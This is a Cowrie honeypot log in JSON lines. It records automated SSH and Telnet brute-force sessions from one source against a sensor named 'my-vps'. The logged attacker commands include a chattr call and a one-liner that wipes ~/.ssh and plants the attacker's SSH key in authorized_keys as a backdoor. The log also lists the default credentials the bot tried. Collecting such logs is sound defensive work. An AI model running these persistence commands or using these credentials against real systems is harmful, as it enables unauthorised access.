{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:09.017541Z","src_ip":"212.227.235.229","session":"181c3a74f08b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:09.324406Z","src_ip":"212.227.235.229","session":"c4e0bfa94976"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:08:10.241298Z","src_ip":"212.227.235.229","session":"181c3a74f08b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64434,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a03131b2471","protocol":"ssh","message":"New connection: 212.227.235.229:64434 (1.2.3.4:22) [session: 9a03131b2471]","sensor":"my-vps","timestamp":"2025-09-08T22:08:10.593624Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:08:10.682834Z","src_ip":"212.227.235.229","session":"c4e0bfa94976"}
{"eventid":"cowrie.login.success","username":"root","password":"Administrator","message":"login attempt [root/Administrator] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:11.108759Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:11.228709Z","src_ip":"212.227.235.229","session":"9a03131b2471"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:11.539201Z","src_ip":"212.227.235.229","session":"181c3a74f08b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64475,"dst_ip":"1.2.3.4","dst_port":22,"session":"240f9bc1aefb","protocol":"ssh","message":"New connection: 212.227.235.229:64475 (1.2.3.4:22) [session: 240f9bc1aefb]","sensor":"my-vps","timestamp":"2025-09-08T22:08:11.741579Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41098,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c4b9e97633b","protocol":"ssh","message":"New connection: 212.227.235.229:41098 (1.2.3.4:22) [session: 1c4b9e97633b]","sensor":"my-vps","timestamp":"2025-09-08T22:08:11.831538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:11.832296Z","src_ip":"212.227.235.229","session":"1c4b9e97633b"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.013012Z","src_ip":"212.227.235.229","session":"c4e0bfa94976"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.126885Z","src_ip":"212.227.235.229","session":"1c4b9e97633b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:12.214386Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.215099Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.215802Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40538,"dst_ip":"1.2.3.4","dst_port":22,"session":"c72d1136032c","protocol":"ssh","message":"New connection: 212.227.235.229:40538 (1.2.3.4:22) [session: c72d1136032c]","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.331768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.332824Z","src_ip":"212.227.235.229","session":"c72d1136032c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.468541Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:12.659101Z","src_ip":"212.227.235.229","session":"c72d1136032c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.284662Z","src_ip":"212.227.235.229","session":"240f9bc1aefb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.347198Z","src_ip":"212.227.235.229","session":"1c4b9e97633b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:13.577352Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.578051Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.640846Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.642440Z","src_ip":"212.227.235.229","session":"1c4b9e97633b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64547,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b99b7c99572","protocol":"ssh","message":"New connection: 212.227.235.229:64547 (1.2.3.4:22) [session: 5b99b7c99572]","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.795534Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.830791Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.832302Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:13.994360Z","src_ip":"212.227.235.229","session":"c72d1136032c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53016,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ba7cbf96c46","protocol":"ssh","message":"New connection: 212.227.235.229:53016 (1.2.3.4:22) [session: 1ba7cbf96c46]","sensor":"my-vps","timestamp":"2025-09-08T22:08:14.077883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:14.079153Z","src_ip":"212.227.235.229","session":"1ba7cbf96c46"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ROSSSH","message":"Remote SSH version: SSH-2.0-ROSSSH","sensor":"my-vps","timestamp":"2025-09-08T22:08:14.307687Z","src_ip":"212.227.235.229","session":"5b99b7c99572"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:14.319159Z","src_ip":"212.227.235.229","session":"c72d1136032c"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:14.326032Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:14.327318Z","src_ip":"212.227.235.229","session":"1ba7cbf96c46"}
{"eventid":"cowrie.client.kex","hassh":"e7c5793d3b7d9f4dd6bd9e027595e061","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512;aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes1256-ctr;hmac-sha1,hmac-sha2-256,hmac-sha2-512;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512"],"keyAlgs":["ssh-rsa","ssh-dss","rsa-sha2-256","rsa-sha2-512"],"encCS":["aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes1256-ctr"],"macCS":["hmac-sha1","hmac-sha2-256","hmac-sha2-512"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e7c5793d3b7d9f4dd6bd9e027595e061","sensor":"my-vps","timestamp":"2025-09-08T22:08:14.943407Z","src_ip":"212.227.235.229","session":"5b99b7c99572"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:08:15.962285Z","src_ip":"212.227.235.229","session":"1ba7cbf96c46"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:16.750908Z","src_ip":"212.227.235.229","session":"5b99b7c99572"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53024,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c360f647c18","protocol":"ssh","message":"New connection: 212.227.235.229:53024 (1.2.3.4:22) [session: 6c360f647c18]","sensor":"my-vps","timestamp":"2025-09-08T22:08:17.467572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:17.468228Z","src_ip":"212.227.235.229","session":"6c360f647c18"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:17.530880Z","src_ip":"212.227.235.229","session":"1ba7cbf96c46"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:17.538676Z","src_ip":"212.227.235.229","session":"5b99b7c99572"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:17.721491Z","src_ip":"212.227.235.229","session":"6c360f647c18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40132,"dst_ip":"1.2.3.4","dst_port":22,"session":"53c2be1dda0d","protocol":"ssh","message":"New connection: 212.227.235.229:40132 (1.2.3.4:22) [session: 53c2be1dda0d]","sensor":"my-vps","timestamp":"2025-09-08T22:08:18.139195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:18.140039Z","src_ip":"212.227.235.229","session":"53c2be1dda0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:18.387067Z","src_ip":"212.227.235.229","session":"53c2be1dda0d"}
{"eventid":"cowrie.login.failed","username":"hack","password":"1234567890","message":"login attempt [hack/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T22:08:19.416740Z","src_ip":"212.227.235.229","session":"53c2be1dda0d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:20.665588Z","src_ip":"212.227.235.229","session":"53c2be1dda0d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:23.467540Z","src_ip":"212.227.235.229","session":"6c360f647c18"}
{"eventid":"cowrie.session.closed","duration":"16.5","message":"Connection lost after 16.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:23.720229Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:24.035032Z","src_ip":"212.227.235.229","session":"6c360f647c18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59194,"dst_ip":"1.2.3.4","dst_port":23,"session":"c5e932882092","protocol":"telnet","message":"New connection: 212.227.125.160:59194 (1.2.3.4:23) [session: c5e932882092]","sensor":"my-vps","timestamp":"2025-09-08T22:08:25.040528Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:25.124708Z","src_ip":"212.227.125.160","session":"c5e932882092"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:25.215815Z","src_ip":"212.227.125.160","session":"c5e932882092"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65044,"dst_ip":"1.2.3.4","dst_port":22,"session":"00ab29fd6cb2","protocol":"ssh","message":"New connection: 212.227.235.229:65044 (1.2.3.4:22) [session: 00ab29fd6cb2]","sensor":"my-vps","timestamp":"2025-09-08T22:08:28.093321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Renci.SshNet.SshClient.0.0.1","message":"Remote SSH version: SSH-2.0-Renci.SshNet.SshClient.0.0.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:28.095009Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.client.kex","hassh":"748f8c627d3f8ff9921d02f86f55ba2c","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,blowfish-cbc,twofish-cbc,twofish192-cbc,twofish128-cbc,twofish256-cbc,arcfour,arcfour128,arcfour256,cast128-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-512-96,hmac-sha2-256-96,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-md5-96-etm@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellma